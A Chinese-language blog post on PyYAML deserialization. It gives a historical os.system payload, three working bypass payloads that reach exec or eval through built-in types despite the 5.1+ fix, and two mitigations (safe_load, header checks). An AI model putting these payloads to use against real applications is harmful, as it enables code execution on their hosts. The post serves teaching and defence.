PyYAML反序列化防御和ByPass是怎么樣的

這篇文章將為大家詳細(xì)講解有關(guān)PyYAML反序列化防御和ByPass是怎么樣的，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

PyYAML介紹

PyYAML是Python出眾的模塊之一。PyYAML就是python的一個yaml庫yaml格式的語言都會有自己的實現(xiàn)來進(jìn)行yaml格式的解析（讀取和保存）。若對于Python反序列化有所了解一定會聽說過它。

PyYAML歷史漏洞和修復(fù)

它的反序列化漏洞使得大多數(shù)Python安全研究人員對齊記憶猶新。

當(dāng)咱們使用反序列化時候會使用如下的載荷：

!!python/object/new:os.system ["whoami"]

并且使用load()進(jìn)行加載時PyYAML將會執(zhí)行os.system("whoami")。這樣會導(dǎo)致命令執(zhí)行，從而輸出用戶名。

該漏洞在5.1+版本之中得到修復(fù)，如果依然使用歷史漏洞載荷，將會得到錯誤提示的告警。

while constructing a Python instance
expected a class, but found <class 'builtin_function_or_method'>
  in "<unicode string>", line 1, column 1:
    !!python/object/new:os.system [" ... 
    ^

這樣因為只能反序列化部分基本類型，極大程度上緩解了反序列化漏洞帶來的影響。

PyYAML ByPass

當(dāng)咱們回看部分基本類型時，將會注意到Python內(nèi)置方法exec、eval。在手冊之中有這樣一段描述。

exec 執(zhí)行儲存在字符串或文件中的Python語句，相比于 eval，exec可以執(zhí)行更復(fù)雜的 Python 代碼。

如此能夠得到ByPass載荷。

PayLoad1:

import yaml

payload = """
- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "print('漏洞存在')"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec
"""
yaml.load(payload)

回顯：
->漏洞存在

PayLoad2:

import yaml

payload = """
!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "print('漏洞存在')"
"""
yaml.load(payload)

回顯：
->漏洞存在

PayLoad3:

import yaml

payload = """
!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - [ print('漏洞存在') ]
"""
yaml.load(payload)

回顯：
->漏洞存在

這三種載荷均是利用基本類型之中代碼執(zhí)行函數(shù)，從而繞過5.1+的防御措施。

修復(fù)方法

1、按照官方推薦使用safe_load對于序列化內(nèi)容進(jìn)行加載。

2、檢測加載文件頭防止加載代碼執(zhí)行函數(shù)。

關(guān)于PyYAML反序列化防御和ByPass是怎么樣的就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學(xué)到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。